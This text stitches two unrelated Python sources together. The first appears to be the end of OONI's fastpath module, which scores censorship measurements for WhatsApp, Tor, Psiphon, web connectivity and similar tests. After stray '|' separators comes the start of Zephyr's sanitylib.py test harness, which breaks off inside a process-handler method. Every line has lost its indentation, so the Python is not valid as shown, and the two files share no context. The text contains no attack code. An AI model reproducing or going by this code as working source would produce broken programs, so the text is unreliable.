# tampering = tk.get("tampering", False)
# if tampering != anomaly:
# scores["accuracy"] = 0.0
# logbug(6, "Incorrect tampering flag", msm)
# return scores
# Headers have been manipulated!
if anomaly:
scores["blocking_general"] = 1.0
return scores
@metrics.timer("score_measurement_whatsapp")
def score_measurement_whatsapp(msm):
"""Calculate measurement scoring for Whatsapp.
Returns a scores dict
"""
# https://github.com/ooni/spec/blob/master/nettests/ts-018-whatsapp.md
# TODO: check data_format_version?
score = 0
tk = msm["test_keys"]
# msg = ""
# for req in msm.get("requests", []):
# if "X-FB-TRIP-ID" not in req.get("response", {}).get("headers", {}):
# score += 0.2
# msg += "Missing HTTP header"
# Disabled due to bug in the probe https://github.com/ooni/probe-engine/issues/341
# if tk.get("registration_server_status", "ok") != "ok":
# score += 0.2
# if tk.get("whatsapp_web_failure", None) != None:
# score += 0.2
# if tk.get("whatsapp_endpoints_status", "ok") != "ok":
# score += 0.2
# if tk.get("whatsapp_web_status", "ok") != "ok":
# # TODO: recalculate using HTML body title
# score += 0.2
# if tk.get("whatsapp_endpoints_dns_inconsistent", []) != []:
# score += 0.2
# if tk.get("whatsapp_endpoints_blocked", []) != []:
# score += 0.2
# registration_server_failure = tk.get("registration_server_failure", None)
# if registration_server_failure is not None:
# if registration_server_failure.startswith("unknown_failure"):
# # Client error
# # TODO: implement confidence = 0
# score = 0
# else:
# score += 0.2
if (
msm.get("software_name", "") == "ooniprobe"
and msm.get("software_version", "") in ("2.1.0", "2.2.0", "2.3.0")
and tk.get("whatsapp_web_status", "") == "blocked"
):
# The probe is reporting a false positive: due to the empty client headers
# it hits https://www.whatsapp.com/unsupportedbrowser
if score == 0.2:
score = 0
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# TODO: refactor
if _detect_unknown_failure(tk):
scores["accuracy"] = 0.0
wf = tk.get("whatsapp_web_failure", "")
if wf and "unknown_failure 'ascii' co" in wf:
assert msm["report_id"]
scores["accuracy"] = 0.0
return scores
requests = tk.get("requests", ()) or ()
if not requests:
assert msm["report_id"]
scores["accuracy"] = 0.0
return scores
# TODO: carve out in a general function
webapp_accessible = None
registration_accessible = None
for b in requests:
url = b.get("request", {}).get("url", "")
if url == "https://web.whatsapp.com/":
webapp_accessible = b.get("failure", True) in (None, "", False)
# TODO: handle cases where the certificate is invalid or the page
# has unexpected contents
# Also note bug https://github.com/ooni/probe-legacy/issues/60
# TODO: handle elif url == "http://web.whatsapp.com/":
elif url == "https://v.whatsapp.net/v2/register":
# In case of connection failure "response" might be empty
registration_accessible = b.get("failure", None) == None
if webapp_accessible is None or registration_accessible is None:
# bug e.g. 20190101T191128Z_AS34594_ZCyS8OE3SSvRwLeuiAeiklVZ8H91hEfY0Ook7ljgfotgpQklhv
scores["accuracy"] = 0.0
return scores
if webapp_accessible is not True or registration_accessible is not True:
scores["blocking_general"] = 1.0
return scores
accessible_endpoints, unreachable_endpoints = _extract_tcp_connect(tk)
if not accessible_endpoints and not unreachable_endpoints:
scores["accuracy"] = 0.0
elif accessible_endpoints > 0:
pass # we call it OK
else:
scores["blocking_general"] = 1.0
scores["analysis"] = dict(
registration_server_accessible=registration_accessible,
whatsapp_web_accessible=webapp_accessible,
whatsapp_endpoints_accessible=accessible_endpoints > 0,
)
return scores
@metrics.timer("score_vanilla_tor")
def score_vanilla_tor(msm):
"""Calculate measurement scoring for Tor (test_name: vanilla_tor)
Returns a scores dict
"""
tk = msm["test_keys"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
nks = ("error", "success", "tor_log", "tor_progress_summary", "tor_progress_tag")
if msm["software_name"] == "ooniprobe" and all_keys_none(tk, nks):
if tk["tor_progress"] == 0:
# client bug?
scores["msg"] = "Client bug"
return scores
tor_log = tk.get("tor_log", None)
if tor_log is None:
# unknown bug
return scores
if (
"Bootstrapped 100%: Done" in tor_log
or "Bootstrapped 100% (done): Done" in tor_log
):
# Success
return scores
progress = float(tk.get("tor_progress", 0))
progress = min(100, max(0, progress))
# If the Tor bootstrap reaches, for example, 80% maybe it's being heavily
# throttled or it's just a very slow network: blocking score is set to 0.68
scores["blocking_general"] = 1.0 - progress * 0.004
return scores
@metrics.timer("score_web_connectivity")
def score_web_connectivity(msm, matches) -> dict:
"""Calculate measurement scoring for web connectivity
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS} # type: Dict[str, Any]
if len(matches):
scores["confirmed"] = True
tk = msm.get("test_keys", None)
if tk is None:
logbug(9, "test_keys is None", msm)
scores["accuracy"] = 0.0
return scores
for m in matches:
l = "blocking_" + m["locality"]
scores[l] += 1.0
# "title_match" is often missing from the raw msmt
# e.g. 20190912T145602Z_AS9908_oXVmdAo2BZ2Z6uXDdatwL9cN5oiCllrzpGWKY49PlM4vEB03X7
tm = tk.get("title_match", None)
if tm not in (True, False, None):
logbug(1, "incorrect title_match", msm)
scores["accuracy"] = 0.0
return scores
# Do not score title_match=False - see #360
# if tm is False:
# scores["blocking_general"] += 0.5
# # TODO: scan HTML body for title instead
# body_proportion can be missing
# Commented out to use the same logic as traditional pipeline
# TODO: enable it after doing statistics on body proportion
# http://www3.cs.stonybrook.edu/~phillipa/papers/JLFG14.pdf
# if "body_proportion" in tk:
# bp = tk["body_proportion"]
# delta = abs((tk["body_proportion"] or 1.0) - 1.0)
# scores["blocking_general"] += delta
# TODO: refactor to apply to all test types
blocking_types = ("tcp_ip", "dns", "http-diff", "http-failure")
if "blocking" not in tk:
logbug(7, "missing blocking field", msm)
scores["accuracy"] = 0.0
elif tk["blocking"] in blocking_types:
scores["blocking_general"] = 1.0
scores["analysis"] = {"blocking_type": tk["blocking"]}
elif tk["blocking"] in (None, False):
pass
else:
logbug(7, "unexpected value for blocking", msm)
scores["analysis"] = {"msg": "Unsupported blocking type"}
scores["accuracy"] = 0.0
# TODO: refactor
if _detect_unknown_failure(tk):
scores["accuracy"] = 0.0
# TODO: add heuristic to split blocking_general into local/ISP/country/global
scores["blocking_general"] += (
scores["blocking_country"]
+ scores["blocking_global"]
+ scores["blocking_isp"]
+ scores["blocking_local"]
)
return scores
@metrics.timer("score_ndt")
def score_ndt(msm) -> dict:
"""Calculate measurement scoring for NDT
Returns a scores dict
"""
# TODO: this is just a stub - add NDT scoring where possible
return {}
@metrics.timer("score_tcp_connect")
def score_tcp_connect(msm) -> dict:
"""Calculate measurement scoring for tcp connect
Returns a scores dict
"""
# https://github.com/ooni/spec/blob/master/nettests/ts-008-tcp-connect.md
# NOTE: this is *NOT* spec/blob/master/data-formats/df-005-tcpconnect.md
# TODO: review scores
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm["test_keys"]
assert msm["input"]
conn_result = tk.get("connection", None)
if conn_result == "success":
return scores
if conn_result == "generic_timeout_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "connection_refused_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "connect_error":
scores["blocking_general"] = 0.8
return scores
if conn_result == "tcp_timed_out_error":
scores["blocking_general"] = 0.8
return scores
# TODO: add missing error type
scores["blocking_general"] = 1.0
return scores
def score_dash(msm) -> dict:
"""Calculate measurement scoring for DASH
(Dynamic Adaptive Streaming over HTTP)
Returns a scores dict
"""
# TODO: review scores
# TODO: any blocking scoring based on performance?
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS} # type: Dict[str, Any]
failure = msm["test_keys"].get("failure", None)
if failure == None:
pass
elif failure == "connection_aborted":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "json_parse_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "eof_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "json_processing_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "http_request_failed":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "connect_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "generic_timeout_error":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "broken_pipe":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif failure == "connection_refused":
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
elif "ssl_error" in failure:
scores["blocking_general"] = 0.1
scores["accuracy"] = 0.0
else:
scores["msg"] = "Probe error"
scores["accuracy"] = 0.0
return scores
def score_meek_fronted_requests_test(msm) -> dict:
"""Calculate measurement scoring for Meek
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm["test_keys"]
requests = tk.get("requests", ()) or ()
if len(requests) == 0:
# requests is empty: usually "success" is missing.
scores["blocking_general"] = 1.0
scores["accuracy"] = 0
return scores
success = tk.get("success", None)
for r in requests:
resp = r.get("response", {})
if resp is None:
# Error during probing?
scores["blocking_general"] = 1.0
if success != None:
log.info("Client bug: success != None")
return scores
if resp.get("code", 0) != 200:
# A failed response is enough
scores["blocking_general"] = 1.0
if success != False:
log.info("Client bug: success != False")
return scores
server = resp.get("headers", {}).get("Server", "")
if not server.startswith("ECAcc "):
scores["blocking_general"] += 0.5
return scores
def score_psiphon(msm) -> dict:
"""Calculate measurement scoring for Psiphon
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
# https://github.com/ooni/spec/blob/master/nettests/ts-015-psiphon.md
failure = tk.get("failure", None)
bootstrap_time = tk.get("bootstrap_time", 0)
if failure is None:
if bootstrap_time == 0:
# should not happen
logbug(4, "invalid psiphon msmt", msm)
scores["accuracy"] = 0.0
else:
# success
scores["accuracy"] = 1.0
else:
# if bootstrap_time == 0: # there was an error bootstrapping Psiphon
# else: # there was an error when using Psiphon
scores["accuracy"] = 1.0
scores["blocking_general"] = 1.0
if "resolver_ip" not in msm:
logbug(0, "no resolver_ip", msm)
scores["accuracy"] = 0.0
return scores
def score_tor(msm) -> dict:
"""Calculate measurement scoring for Tor (test_name: tor)
https://github.com/ooni/spec/blob/master/nettests/ts-023-tor.md
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
# targets -> <ipaddr:port>|<sha obfs4 fprint> -> failure
# -> network_events
targets = tk.get("targets", {})
if not targets:
logbug(5, "missing Tor targets", msm)
scores["accuracy"] = 0.0
return scores
blocked_cnt = 0
not_run_cnt = 0
success_cnt = 0
for d in targets.values():
if "failure" not in d or "network_events" not in d:
logbug(6, "missing Tor failure or network_events field", msm)
scores["accuracy"] = 0.0
return scores
f = d["failure"]
# False: did not run: N/A
# None: success
# string: failed
if f is False:
not_run_cnt += 1
elif f == None:
success_cnt += 1
elif f == "":
# logbug(8
assert 0, d
else:
blocked_cnt += 1
if blocked_cnt + success_cnt:
scores["blocking_general"] = blocked_cnt / (blocked_cnt + success_cnt)
else:
scores["accuracy"] = 0.0
return scores
def score_http_requests(msm) -> dict:
"""Calculates measurement scoring for legacy test http_requests
Returns a scores dict
"""
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
tk = msm.get("test_keys", {})
body_length_match = tk.get("body_length_match", None)
headers_match = tk.get("headers_match", None)
rid = msm.get("report_id", None)
inp = msm.get("input", None)
failed = msm.get("control_failure", None) or msm.get("experiment_failure", None)
if failed or body_length_match is None or headers_match is None:
scores["accuracy"] = 0.0
log.debug(f"Incorrect measurement t1 {rid} {inp}")
return scores
reachable = bool(body_length_match) and bool(headers_match)
if not reachable:
scores["blocking_general"] = 1.0
zzfps = fingerprints["ZZ"]
msm_cc = msm.get("probe_cc", None)
ccfps = fingerprints.get(msm_cc, {})
# Scan for fingerprint matches in the HTTP body and the HTTP headers
# One request is from the probe and one is over Tor. If the latter
# is blocked the msmt is failed.
tk = msm.get("test_keys", {})
for r in tk.get("requests", []):
is_tor = r.get("request", {}).get("tor", {}).get("is_tor", None)
body = r.get("response", {}).get("body", None)
if is_tor is None or body is None:
scores["accuracy"] = 0.0
log.debug(f"Incorrect measurement t2 {rid} {inp}")
return scores
if isinstance(body, dict):
# TODO: is this needed?
if "data" in body and body.get("format", "") == "base64":
log.debug("Decoding base64 body")
body = b64decode(body["data"])
else:
logbug(2, "incorrect body of type dict", msm)
body = None
for fp in zzfps["body_match"] + ccfps.get("body_match", []):
bm = fp["body_match"]
if isinstance(body, bytes):
idx = body.find(bm.encode())
else:
idx = body.find(bm)
if idx != -1:
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement t1 {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched body fp %s %r at pos %d", msm_cc, bm, idx)
# Match HTTP headers if found
headers = r.get("headers", {})
headers = {h.lower(): v for h, v in headers.items()}
for fp in zzfps["header_full"] + ccfps.get("header_full", []):
name = fp["header_name"]
if name in headers and headers[name] == fp["header_full"]:
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement t2 {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched header full fp %s %r", msm_cc, fp["header_full"])
for fp in zzfps["header_prefix"] + ccfps.get("header_prefix", []):
name = fp["header_name"]
prefix = fp["header_prefix"]
if name in headers and headers[name].startswith(prefix):
if is_tor:
scores["accuracy"] = 0.0
log.debug(f"Failed measurement {rid} {inp}")
return scores
scores["confirmed"] = True
log.debug("matched header prefix %s %r", msm_cc, prefix)
return scores
def score_dns_consistency(msm) -> dict:
"""Calculates measurement scoring for legacy test dns_consistency
Returns a scores dict
"""
# TODO: implement scoring
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
return scores
@metrics.timer("score_measurement")
def score_measurement(msm: dict) -> dict:
"""Calculates measurement scoring. Returns a scores dict"""
# Blocking locality: global > country > ISP > local
# unclassified locality is stored in "blocking_general"
tn = msm["test_name"]
try:
if tn == "telegram":
return score_measurement_telegram(msm)
if tn == "facebook_messenger":
return score_measurement_facebook_messenger(msm)
if tn == "http_header_field_manipulation":
return score_measurement_hhfm(msm)
if tn == "http_invalid_request_line":
return score_http_invalid_request_line(msm)
if tn == "whatsapp":
return score_measurement_whatsapp(msm)
if tn == "vanilla_tor":
return score_vanilla_tor(msm)
if tn == "web_connectivity":
matches = match_fingerprints(msm)
return score_web_connectivity(msm, matches)
if tn == "ndt":
return score_ndt(msm)
if tn == "tcp_connect":
return score_tcp_connect(msm)
if tn == "dash":
return score_dash(msm)
if tn == "meek_fronted_requests_test":
return score_meek_fronted_requests_test(msm)
if tn == "psiphon":
return score_psiphon(msm)
if tn == "tor":
return score_tor(msm)
if tn == "http_requests":
return score_http_requests(msm)
if tn == "dns_consistency":
return score_dns_consistency(msm)
log.debug("Unsupported test name %s", tn)
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["accuracy"] = 0.0
return scores
except AssertionError as e:
# unknown / new client bugs are often caught by assertions
if str(e).startswith("pbug "): # suspected probe bug
logbug(0, str(e)[4:], msm)
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["accuracy"] = 0.0
return scores
raise
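# Purely illustrative sketch (hypothetical measurement, not real data) of how
# the dispatcher above is used and what the returned dict looks like, assuming
# LOCALITY_VALS contains values such as "general", "global", "country", "isp"
# and "local":
#
#   scores = score_measurement({"test_name": "dash", "test_keys": {...}, ...})
#   # e.g. {"blocking_general": 0.0, "blocking_global": 0.0,
#   #       "blocking_country": 0.0, "blocking_isp": 0.0, "blocking_local": 0.0}
#
# Per-test scorers may add extra keys such as "accuracy", "confirmed" or "msg".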
@metrics.timer("trivial_id")
def trivial_id(msm: dict) -> str:
"""Generate a trivial id of the measurement to allow upsert if needed
This is used for legacy (before measurement_uid) measurements
- 32-bytes hexdigest
- Deterministic / stateless with no DB interaction
- Malicious/bugged msmts with collisions on report_id/input/test_name lead
to different hash values avoiding the collision
- Malicious/duplicated msmts that are semantically identical to the "real"
one lead to harmless collisions
"""
# NOTE: we want the id to stay the same when a msmt is fetched over SSH
# and from a can on ooni-data-private/canned
# Implementing a rolling hash without ujson.dumps is 2x faster
# A rolling hash on only the first 2 levels of the dict is 10x faster
#
# Same output with Python's json
VER = "00"
msm_jstr = ujson.dumps(msm, sort_keys=True, ensure_ascii=False).encode()
tid = VER + hashlib.shake_128(msm_jstr).hexdigest(15)
return tid
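# Illustrative (hypothetical) use of trivial_id; the measurement dict below is
# made up for demonstration only. The result is always the "00" version prefix
# followed by 30 hex characters from shake_128:
#
#   tid = trivial_id({"report_id": "r1", "input": "https://example.org/"})
#   assert len(tid) == 32 and tid.startswith("00")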
def unwrap_msmt(post):
fmt = post["format"].lower()
if fmt == "json":
return post["content"]
if fmt == "yaml":
return yaml.safe_load(post["content"])
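# Illustrative example of the wrapped form handled by unwrap_msmt (hypothetical
# payload): {"format": "json", "content": {"report_id": "...", ...}} returns the
# inner "content" dict, while a "yaml" format payload is parsed with
# yaml.safe_load first.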
def msm_processor(queue):
"""Measurement processor worker"""
if conf.no_write_to_db:
log.info("Skipping DB connection setup")
else:
db.setup(conf)
while True:
msm_tup = queue.get()
if msm_tup is None:
log.info("Worker with PID %d exiting", os.getpid())
return
with metrics.timer("full_run"):
try:
msm_jstr, measurement, msmt_uid = msm_tup
if measurement is None:
measurement = ujson.loads(msm_jstr)
if sorted(measurement.keys()) == ["content", "format"]:
measurement = unwrap_msmt(measurement)
rid = measurement.get("report_id", None)
inp = measurement.get("input", None)
log.debug(f"Processing {msmt_uid} {rid} {inp}")
if measurement.get("probe_cc", "").upper() == "ZZ":
log.debug(f"Ignoring measurement with probe_cc=ZZ")
metrics.incr("discarded_measurement")
continue
if measurement.get("probe_asn", "").upper() == "AS0":
log.debug(f"Ignoring measurement with ASN 0")
metrics.incr("discarded_measurement")
continue
scores = score_measurement(measurement)
# Generate anomaly, confirmed and failure to keep consistency
# with the legacy pipeline, allowing simple queries in the API
# and in manual analysis; also keep compatibility with Explorer
anomaly = scores.get("blocking_general", 0.0) > 0.5
failure = scores.get("accuracy", 1.0) < 0.5
confirmed = scores.get("confirmed", False)
if anomaly or failure or confirmed:
log.debug(
f"Storing {msmt_uid} {rid} {inp} A{int(anomaly)} F{int(failure)} C{int(confirmed)}"
)
sw_name = measurement.get("software_name", "unknown")
sw_version = measurement.get("software_version", "unknown")
platform = "unset"
if "annotations" in measurement and isinstance(
measurement["annotations"], dict
):
platform = measurement["annotations"].get("platform", "unset")
if msmt_uid is None:
msmt_uid = trivial_id(measurement) # legacy measurement
if conf.no_write_to_db:
continue
db.upsert_summary(
measurement,
scores,
anomaly,
confirmed,
failure,
msmt_uid,
sw_name,
sw_version,
platform,
conf.update,
)
except Exception as e:
log.exception(e)
metrics.incr("unhandled_exception")
def shut_down(queue):
log.info("Shutting down workers")
[queue.put(None) for n in range(NUM_WORKERS)]
# FIXME
# queue.close()
# queue.join_thread()
def core():
# There are 3 main data sources, in order of age:
# - cans on S3
# - older report files on collectors (max 1 day of age)
# - report files on collectors fetched in "real-time"
# Load json/yaml files and apply filters like canning
t00 = time.time()
# Spawn worker processes
# 'queue' is a singleton from the portable_queue module
workers = [
mp.Process(target=msm_processor, args=(queue,)) for n in range(NUM_WORKERS)
]
try:
[t.start() for t in workers]
if conf.noapi:
# Pull measurements from S3
process_measurements_from_s3(queue)
else:
# Start HTTP API
log.info("Starting HTTP API")
start_http_api(queue)
except Exception as e:
log.exception(e)
finally:
log.info("Shutting down workers")
time.sleep(1)
shut_down(queue)
time.sleep(1)
log.info("Join")
[w.join() for w in workers]
log.info("Join done")
clean_caches()
def setup_fingerprints():
"""Setup fingerprints lookup dictionary
"ZZ" applies a fingerprint globally
"""
# pre-process fingerprints to speed up lookup
global fingerprints
# cc -> fprint_type -> list of dicts
fingerprints = {"ZZ": {"body_match": [], "header_prefix": [], "header_full": []}}
for cc, fprints in fastpath.utils.fingerprints.items():
d = fingerprints.setdefault(cc, {})
for fp in fprints:
assert fp["locality"] in LOCALITY_VALS, fp["locality"]
if "body_match" in fp:
d.setdefault("body_match", []).append(fp)
elif "header_prefix" in fp:
fp["header_name"] = fp["header_name"].lower()
d.setdefault("header_prefix", []).append(fp)
elif "header_full" in fp:
fp["header_name"] = fp["header_name"].lower()
d.setdefault("header_full", []).append(fp)
def main():
setup()
setup_fingerprints()
log.info("Starting")
core()
if __name__ == "__main__":
main()
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
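# Illustrative example (not taken from a real cache file): the line
#   ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr
# matches with name='ZEPHYR_TOOLCHAIN_VARIANT', type='STRING' and value='zephyr'.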
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
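# A minimal usage sketch of CMakeCache (hypothetical cache path and entry names):
#
#   cache = CMakeCache.from_file("build/CMakeCache.txt")
#   board = cache.get("CACHED_BOARD")        # None if the entry is absent
#   flags = cache.get_list("EXTRA_CFLAGS")   # always a list, possibly empty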
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# Encapsulate the terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja versions don't seem to pass SIGTERM down to the children,
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
